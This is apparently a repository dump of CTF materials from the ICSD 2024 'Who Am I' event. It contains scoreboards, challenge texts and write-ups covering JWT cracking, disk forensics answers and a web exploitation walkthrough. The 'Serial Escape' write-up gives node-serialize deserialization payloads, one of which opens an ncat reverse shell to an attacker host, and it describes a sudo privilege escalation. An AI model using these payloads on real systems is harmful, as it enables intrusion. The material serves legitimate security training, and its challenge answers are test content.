24 | | CyberYashma | 20 30 | 20 30 | 30 30 - | 30 30 - | - - - - | - - - | 220 |
25 | | DoublePulsar | 20 30 | - - | 30 30 - | - - - | - - - - | - - - | 110 |
26 | | ALLSAFE | 20 30 | - - | 30 30 - | - - - | - - - - | - - - | 110 |
27 | | CBAR_TEAM | 20 30 | 20 30 | - - - | - - - | - - - - | - - - | 100 |
28 | | ExploitationUnit | 20 30 | 20 30 | - - - | - - - | - - - - | - - - | 50 |
29 |
30 | Unfortunately, the other 5 teams scored 0 points.
31 |
32 | During the competition, several hints were shared at random time intervals for each machine. These hints even included credentials for the gitlab machine in the format root:base64(password) and 2 CVE numbers!
33 |
34 | The fact that five teams were unable to score any points can be primarily attributed to their limited experience in CTF competitions. It's crucial to stress that this environment is simulated and can be quite challenging, not exactly mirroring real-world penetration testing experiences. Consequently, lower scores should not be seen as indicative of anyone's inability to perform penetration tests or blue teaming effectively.
35 |
36 |
37 | # Some moments from the competition
38 |
39 | 
40 | ___
41 | 
42 | ___
43 | 
44 | ___
45 | 
46 | ___
47 | 
48 | ___
49 | 
50 | ___
51 | 
52 | ___
53 | 
54 | ___
55 | 
56 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # ICSD
2 |
3 | In this repository, you will find materials from past CTF competitions held during ICSD (International Cyber Security Days) events.
4 |
5 | Previously hosted events:
6 | 1. 2023 - 'Game of Thrones'
7 | 2. 2024 - 'Who Am I'
8 |
--------------------------------------------------------------------------------
/Who Am I/README.md:
--------------------------------------------------------------------------------
1 | # 'Who Am I' - Capture the Flag
2 |
3 | As part of the ICSD 2024 conference, we had the privilege of hosting the Capture the Flag (CTF) competition, Who Am I.
4 |
5 | A total of 20 teams, each consisting of 2-3 participants, competed for a prize pool of 9,000 AZN, with 5,000 AZN awarded to the first-place team, 3,000 AZN to the second, and 1,000 AZN to the third. The competition took place on September 20th, running from 08:30 to 14:15, lasting nearly six hours.
6 |
7 | _Boşver_ emerged as the winner, scoring 1,080 out of a possible 2,100 points. _BHOSploit_ claimed second place with 1,030 points, and _Kabiner_ secured third place with 800 points.
8 |
9 | In this repository, we will share all the challenges used during the competition, along with what we consider to be the correct solutions. Additionally, we will provide statistics on the competitors, teams, and individual questions.
10 |
11 | # General Information
12 | ## Challanges
13 | A total of 12 challenges were presented to the competitors, each consisting of one or more questions, amounting to 31 questions in total.
14 |
15 | Challenges covered various aspects of cybersecurity such as Cryptograhy, OSINT, Steganography, Log Analysis, Disk Forensics, Penetration Testing and Privilege Escalation. Each challenge was assigned a total score, which was distributed across the questions based on their difficulty level.
16 |
17 |
18 | | Challenge Name | Difficulty | Challenge Score | Question Count | Score for each Question | Covers |
19 | |------------------------------|------------|-----------------|----------------|-----------------------------------|-------------------------------------------|
20 | | **C1: Death Token** | Easy | 100 | 1 | 100 | Cryptography |
21 | | **C1: Decode the Escape** | Easy | 100 | 1 | 100 | Cryptography |
22 | | **C3: ANAIS_WATT3RSON** | Easy | 100 | 1 | 100 | OSINT |
23 | | **C4: #exec cmd= “whoami”** | Easy | 125 | 4 | 25, 30, 30, 40 | Steganography, OSINT |
24 | | **C5: Packet Detective** | Easy | 125 | 9 | 10, 10, 10, 10, 10, 15, 15, 20, 25| Forensics, Packet Analysis |
25 | | **C6: Exorcising Sukuna’s Curse** | Medium | 130 | 2 | 60, 70 | Vulnerability Exploitation |
26 | | **C7: Root Reaper Quest** | Medium | 150 | 1 | 150 | Log Analysis |
27 | | **C8: In Quest for Rogue Dragon** | Medium | 170 | 2 | 100, 70 | Reverse Engineering |
28 | | **C9: End of Rumbling** | Hard | 200 | 2 | 100, 100 | Active Directory Exploitation |
29 | | **C10: Shadows Possession Jutsu** | Hard | 250 | 3 | 100, 75, 75 | Forensics, Disk Analysis |
30 | | **C11: Serial Escape** | Hard | 250 | 3 | 100, 100, 50 | Web Exploitation |
31 | | **C12: Mr. Windoclin** | Hard | 300 | 2 | 150, 150 | Vulnerability Exploitation, Docker Escape |
32 | | **Total** | | **2000** | **31** | | |
33 |
34 | > [!NOTE]
35 | > Some challenges may have included references to films or anime shows, but none required knowledge of them to be solved.
36 |
37 | ## Standings
38 |
39 | > [!IMPORTANT]
40 | > All flag submission attempts (whether correct or incorrect) have been logged and are available in 'ctf_submission_logs.csv' file.
41 |
42 | | N% | Team | C1 | C2 | C3 | C4 | C5 | C6 | C7 | C8 | C9 | C10 | C11 | C12 | Score | Extra | Total |
43 | | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: |
44 | | 1 | boşver | 100 | - | 100 | 125 | 125 | 130 | 150 | - | - | - | 250 | - | 980 | 100 | 1080 |
45 | | 2 | BHOSsploit | 100 | 100 | 100 | 125 | 125 | 130 | - | - | - | - | 100 | 150 | 930 | 100 | 1030 |
46 | | 3 | Kaniber | 100 | - | 100 | 125 | 125 | - | 150 | - | - | - | 100 | - | 700 | 100 | 800 |
47 | | 4 | SUDOERS | 100 | - | - | 85(+++-) | 100(+-+++-+++) | - | 150 | 100(+-) | - | 100(+--) | - | - | 635 | 100 | 735 |
48 | | 5 | 405 Found | - | - | 100 | 125 | 125 | 130 | 150 | - | - | - | - | - | 630 | 100 | 730 |
49 | | 6 | Felina | 100 | 100 | - | 125 | 125 | 130 | - | - | - | - | - | - | 580 | 100 | 680 |
50 | | 7 | R3d3f3nd | 100 | - | 100 | 125 | 110(+++++-+++) | 130 | - | - | - | - | - | - | 565 | 100 | 665 |
51 | | 8 | Zero Zero | - | - | - | 125 | 110(+++++-+++) | 130 | 150 | - | - | - | - | - | 515 | 100 | 615 |
52 | | 9 | ASCCA | - | - | 100 | 125 | 110(+++++-+++) | - | 150 | - | - | - | - | - | 485 | 100 | 585 |
53 | | 10 | Cerberus | - | - | 100 | 125 | 100(+-+++-+++) | 130 | - | - | - | - | - | - | 455 | 100 | 555 |
54 | | 11 | CyberCell | 100 | - | - | 85(+++-) | 110(+++++-+++) | - | 150 | - | - | - | - | - | 445 | 100 | 545 |
55 | | 12 | FR13NDS | 100 | - | - | 85(+++-) | 115(+-+++++++) | 130 | - | - | - | - | - | - | 430 | 100 | 530 |
56 | | 13 | AzInfosec | - | - | - | 125 | 115(+-+++++++) | 130 | - | - | - | - | - | - | 370 | 100 | 470 |
57 | | 14 | Iron First | - | - | - | 85(+++-) | 110(+++++-+++) | - | 150 | - | - | - | - | - | 345 | 100 | 445 |
58 | | 15 | Cyberstars | 100 | - | - | 85(+++-) | 110(+++++-+++) | - | - | - | - | - | - | - | 295 | 100 | 395 |
59 | | 16 | 127.0.0.Biz | - | - | - | 55(+-+-) | 115(+-+++++++) | - | - | - | - | - | - | - | 170 | 100 | 270 |
60 | | 17 | Leet Duo | - | - | - | 85(+++-) | 20(+-+------) | - | - | - | - | - | - | - | 105 | 100 | 205 |
61 | | 18 | Fourier | - | - | - | 85(+++-) | 10(+--------) | - | - | - | - | - | - | - | 95 | 0 | 95 |
62 | | 19 | CyberSpace | - | - | - | 25(+---) | 10(+--------) | - | - | - | - | - | - | - | 35 | 0 | 35 |
63 | | 20 | Overclock | - | - | - | - | - | - | - | - | - | - | - | -| 0 | 0 | 0 |
64 |
65 | > [!NOTE]
66 | > Extra 100 points are awarded for filling a form about PROCYBERLAB platform.
--------------------------------------------------------------------------------
/Who Am I/Writeups/C1 - Death Token Challenge/README.md:
--------------------------------------------------------------------------------
1 | **C1 - Death Token Challenge**
2 |
3 | *The Death Token holds twisted truths. Your task is to reconstruct the token by correcting false information hidden in its payload. A mere correction brings you closer to restoring the true power of the token. Can you fix the lies and unlock the token's potential? (Ryuk says it needs to be in JWT format or next token will be named after you)*
4 |
5 | Twisted JWT Token: *eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkZWF0aF90aW1lIjo1MTEyMDA3LCJuYW1lIjoiTCIsImtpbGxlciI6IllhZ2FtaSBMaWdodCIsInF1b3RlIjoiV2hhdCBkbyB5b3UgdGhpbmsgb2YgdGhhdCwgTD8gVGhpcyBpcyBteSBwZXJmZWN0IHZpY3RvcnkhIFRIQVQnUyBSSUdIVCwgSSBXSU4hISEhISEhISEiLCJzdGF0dXMiOiJhbGl2ZSJ9.2AUGVcRFfrZ75xL-3TBNcFuGDEkLTc73jsw0ZKWnKWs*
6 |
7 | 
8 |
--------------------------------------------------------------------------------
/Who Am I/Writeups/C1 - Death Token Challenge/Writeup.md:
--------------------------------------------------------------------------------
1 | # C1 - Death Token Challange
2 |
3 | In this challenge, we are tasked with correcting false data in a JWT token. When we paste the token into jwt.io, we can see it contains information related to characters from the Death Note series:
4 |
5 | 
6 |
7 | First, we cracked the JWT token using the following command:
8 |
9 | `hashcat -a 0 -m 16500 jwt.txt rockyou.txt`
10 |
11 | 
12 |
13 | As we can see, the key is "death". Now, addressing the false data issue—without even knowing the plot, we can spot something suspicious. The name of the character is "L", there is a killer named "Yagami Light", but the status says "alive"? That seems odd. A quick search confirms that Yagami indeed killed L. So, what we need to change in the payload is the status. We update "alive" to "death" (which makes sense, given the key is "death" too):
14 |
15 | 
16 |
17 | And with that, we’ve created the correct token that Ryuk was after. He’s satisfied now, and he’s letting you go… or are you his next source of entertainment?
18 |
19 | 
--------------------------------------------------------------------------------
/Who Am I/Writeups/C1 - Death Token Challenge/images/image.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C1 - Death Token Challenge/images/image.jpg
--------------------------------------------------------------------------------
/Who Am I/Writeups/C1 - Death Token Challenge/images/image1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C1 - Death Token Challenge/images/image1.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C1 - Death Token Challenge/images/image2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C1 - Death Token Challenge/images/image2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C1 - Death Token Challenge/images/image3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C1 - Death Token Challenge/images/image3.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C1 - Death Token Challenge/images/image4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C1 - Death Token Challenge/images/image4.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/README.md:
--------------------------------------------------------------------------------
1 | **C10: Shadows Possession Jutsu**
2 |
3 | *A hidden threat lurks in the network, moving like a shadow possession jutsu, silently altering systems. The attacker’s strategy mirrors Shikamaru’s genius—calculated, precise, and hard to trace. As a shinobi investigator, your mission is to uncover the faint trails left behind, crack the coded mysteries like deciphering enemy jutsu, and stop the threat before it spreads like the Akatsuki’s influence. The fate of the network depends on your ability to outwit this unseen adversary—will you illuminate the shadows, or fall prey to their cunning?*
4 |
5 | 
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/Writeup.md:
--------------------------------------------------------------------------------
1 | # C10 - Shadows Possession Jutsu:
2 |
3 | When we start the machine, we notice several tools and a file available:
4 |
5 | - **AccessData FTK Imager**: This tool is used for both acquiring and analyzing image files.
6 | - **HxD**: A tool designed for editing a file's bytes.
7 | - **icsd.001**: Upon examining the headers, we can identify that this is an NTFS file system image.
8 |
9 | 
10 |
11 | However, when we attempt to open the file in FTK Imager, it shows as an unrecognized file system. This could be caused by corrupted header and footer bytes.
12 |
13 | 
14 |
15 | Therefore, we open the file again in HxD and look for header and footer bytes.
16 |
17 | When investigating the header and footer bytes for NTFS file system we see that it should be like this:
18 |
19 | - **Bytes 0x03–0x0A**: Signature "NTFS".
20 | - Last 2 bytes of MBR (first sector of NTFS) should be 55 AA.
21 |
22 | After correcting these bytes with HxD, FTK Imager can identify and analyze the file system.
23 | [4] 85 → 54,
24 |
25 | [510-511] 22 55 → 55 AA
26 |
27 | 
28 |
29 | After examining the recycle bin and the user desktop, we discovered a **password** and a **ZIP file**. The first assumption is that the password might be used to unlock the ZIP file.
30 |
31 | 
32 |
33 | 
34 |
35 | Content of the pw.txt is “hello123”
36 |
37 | And there is a txt file in the found zip file
38 |
39 | 
40 |
41 | Let us extract and read the file with the winrar to be able to provide password.
42 |
43 | 
44 |
45 | The answer of the first question is the “U2hpbWlzaGFv”.
46 |
47 | 1. Question is “What malware is used for persistence?”.
48 |
49 | Lets look at registries for autorun.
50 |
51 | We need to look at “Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run”
52 |
53 | In order to find that key we need to extract “C:\Users\icsd\ntuser.dat*” files.
54 |
55 | 
56 |
57 | 
58 |
59 | After viewing that registry with “Registry Editor” we find the naswer is “gh0st.exe”
60 |
61 | 
62 |
63 | 1. What is the name of the flash disk used to install the malware?
64 |
65 | In order to find the inserted flash disks we need to look for
66 |
67 | “Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet001\Enum\USBSTOR”
68 |
69 | registry.
70 |
71 | We need to extract “C:\Windows\system32\config\SYSTEM*” files for that.
72 |
73 | 
74 |
75 | 
76 |
77 | Answer is “SanDisk”
78 |
79 | To Sum Up
80 |
81 | Questions:
82 |
83 | 1. What is the content of the data.zip? “U2hpbWlzaGFv”
84 | 2. What malware is used for persistence? “gh0st.exe”
85 | 3. What is the name of the flash disk used to install the malware? “sandisk”
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 1.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 10.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 11.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 12.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 12.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 3.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 4.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 5.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 6.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 7.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 8.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 9.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/README.md:
--------------------------------------------------------------------------------
1 | # Serial Escape
2 |
3 | Exploit vulnerabilities in the web application, gain access to the underlying machine, and escalate your privileges to become the root user.
4 |
5 |
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/Writeup.md:
--------------------------------------------------------------------------------
1 | # Serial Escape
2 |
3 | You can begin by running a basic NMAP scan on the target.
4 |
5 | ```bash
6 | nmap -sV -v <target IP>
7 | ```
8 |
9 | 
10 |
11 | Based on the NMAP result, there are two open ports: SSH (22) and HTTP (80).
12 | If you navigate to the target IP address on a browser you will see a page as follows.
13 |
14 | 
15 |
16 | Based on the error message, you can understand that the base URL "/" requires authentication to visit.
17 |
18 | To discover directories on the web application, you can use a directory brute-forcing tool like FFUF. This revealed an additional directory named 'dev', which also requires authentication.
19 |
20 | 
21 |
22 | When you navigate to the registration page to create a new user, you will see that the form requires you to enter an email address ending with "@oracle.az" only.
23 |
24 | 
25 |
26 | Upon registering, the application sends an OTP code to the provided email for verification, ensuring that users cannot create accounts with fake email addresses. However, after further inspection, you can notice that the email validation (checking if it ends with '@oracle.az') is only performed on the client side.
27 |
28 | 
29 |
30 | You can complete the registration form with dummy data, capture the network traffic using Burp Suite, and modify the email field to use an address of your choice — either a personal email or a temporary/disposable one to receive the OTP and complete verification. For demonstration purposes, a temporary email was used.
31 |
32 | https://temp-mail.org/
33 |
34 | 
35 |
36 | Once you have placed a valid email address you can forward the traffic, which will send an OTP to the provided address.
37 |
38 | 
39 |
40 | To complete the registration process, enter the OTP code and submit.
41 |
42 | 
43 | 
44 |
45 | As a result, you will be redirected to the login page with a success message indicating that you have successfully created a new user.
46 | Having a user on the web application you can now log in. On the home page, you will see the first flag for the CTF.
47 |
48 | 
49 |
50 | Since you now have a valid user, you can visit the "dev" directory discovered earlier while directory brute-forcing with FFUF.
51 | On the "dev" directory you will see two files: notes.txt and source.zip
52 |
53 | 
54 |
55 | The notes.txt file contains a message titled 'Security Alert,' highlighting a critical vulnerability in the application originating from a package called ```node-serialize```.
56 | According to this message, you can understand that your next step will be downloading the source code of the web app (```/dev/source.zip```) and analyzing it to move the attack further.
57 |
58 | 
59 |
60 | To begin your code review, start with the ```app.js``` file. In the ```app.js``` file, you'll again notice a warning comment regarding the ```node-serialize``` package.
61 |
62 | 
63 |
64 | To identify what the node-serialize package is vulnerable to, you can search online. You'll discover that it has a critical vulnerability: arbitrary remote code execution, which is explained in the following link. This vulnerability specifically affects the ```unserialize``` function, according to the explanation.
65 | https://security.snyk.io/vuln/npm:node-serialize:20170208
66 |
67 | Knowing that the web application is vulnerable to remote code execution, you can examine the source code further to find out where and how the ```node-serialize``` package is used. By searching in the ```app.js``` file, you'll find that the vulnerable package is passed to the ```home``` router after being imported.
68 |
69 | 
70 |
71 | To understand how and for what functionality of the web application the ```node-serialize``` package is used, open the JavaScript file responsible for the home page.
72 | Upon reviewing the code, two key points emerge:
73 | * When a user searches for a keyword, it is taken from the request, serialized, and stored in a cookie named ```last_search```.
74 | * During each GET request to the home page, the value of the ```last_search``` cookie is retrieved, **_UNSERIALIZED_** (which is the vulnerable part), and passed to the client side to be displayed.
75 |
76 | This functionality allows users to see their most recent search by storing its value in a cookie.
77 |
78 | 
79 |
80 | In the image below, you can see an example usage of this functionality.
81 |
82 | 
83 |
84 | As your next step, you have to craft such a payload that will execute system commands on the target website.
85 | You can find an example payload from the link provided earlier.
86 |
87 | ```javascript
88 | {"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}
89 | ```
90 |
91 | To adjust the payload for our target application, we need to strip away the dictionary structure, remove enclosing double quotes, escape characters, leaving only the core payload.
92 |
93 | To test if the payload works, we can attempt to ping our attacking machine and verify whether the injected system command is executed. To detect the ping requests, start a ```tcpdump``` on the attacker machine to monitor ICMP traffic.
94 |
95 | ```javascript
96 | _$$ND_FUNC$$_function (){require('child_process').exec('ping <attacker IP> -c 3', function(error, stdout, stderr) { console.log(stdout) });}()
97 | ```
98 |
99 | Keep in mind that for successful code execution, the payload must first be sent to the web application. After that, you need to send another search keyword. This way, the payload becomes your previous search query and gets unserialized when accessing the home page. The vulnerability, as mentioned earlier, lies in the unserialize function of the package, not the serialize function.
100 |
101 | Once the payload above is injected, you will observe six ICMP packets: three requests and three replies.
102 |
103 | 
104 |
105 | Confirming that the payload works, you can modify the payload to get a reverse shell.
106 |
107 | ```javascript
108 | _$$ND_FUNC$$_function (){require('child_process').exec('ncat <attacker IP> <attacker Port> -e /bin/bash', function(error, stdout, stderr) { console.log(stdout) });}()
109 | ```
110 |
111 | Upon injection of the payload above, you will get a reverse shell under the "www-data" user, which will enable you to grab the second flag for the CTF.
112 |
113 | 
114 | 
115 |
116 | Moving on you can start looking around for a vulnerability/misconfiguration leading to privilege escalation.
117 | As a result of executing the ```sudo -l``` command, you can see that the www-data user is allowed to run the following command with ```sudo``` privileges.
118 |
119 | ```
120 | /usr/bin/apt edit-sources ../*
121 | ```
122 | 
123 |
124 | Executing the command ```sudo /usr/bin/apt edit-sources ../foo``` will present you with multiple options to choose a text editor. For privilege escalation, you can select either ```nano``` or ```vim```. Since these editors will run with sudo privileges, you can implement techniques to escalate your privileges. Both editors have techniques for privilege escalation, which you can find in the following links:
125 |
126 | https://gtfobins.github.io/gtfobins/vim/#sudo
127 |
128 | https://gtfobins.github.io/gtfobins/nano/#sudo
129 |
130 | 
131 |
132 | As a result, you will gain elevated privileges on the target machines under the root user and will be able to read the last flag for the CTF.
133 |
134 | 
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h29_25.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h29_25.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h30_17.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h30_17.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h30_48.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h30_48.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h31_16.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h31_16.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h36_49.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h36_49.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h38_46.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h38_46.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h39_16.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h39_16.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h39_31.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h39_31.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h39_50.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h39_50.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h41_34.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h41_34.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h41_42.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h41_42.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h45_54.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h45_54.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h54_27.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h54_27.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h12_04.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h12_04.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h22_19.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h22_19.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h24_52.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h24_52.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h30_58.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h30_58.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h33_34.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h33_34.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h34_12.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h34_12.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h35_11.png:
--------------------------------------------------------------------------------
